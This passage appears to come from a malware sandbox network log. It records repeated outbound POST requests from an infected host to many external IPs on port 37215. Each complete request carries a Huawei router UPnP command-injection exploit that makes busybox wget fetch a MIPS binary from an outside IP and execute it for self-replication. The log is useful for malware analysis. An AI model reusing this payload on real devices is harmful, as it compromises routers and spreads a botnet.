6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  271192.168.2.135430041.36.74.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097007036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  272192.168.2.134677441.56.183.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097240925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  273192.168.2.1342030157.218.142.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097243071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  274192.168.2.1359956157.240.100.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097268105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  275192.168.2.1346590197.41.70.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097269058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  276192.168.2.136060641.169.45.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097340107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  277192.168.2.1345428197.195.209.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097345114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  278192.168.2.1347340197.3.45.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097376108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  279192.168.2.1343676197.130.9.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097379923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  280192.168.2.135649041.129.180.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097383022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  281192.168.2.134529693.19.191.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.097675085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
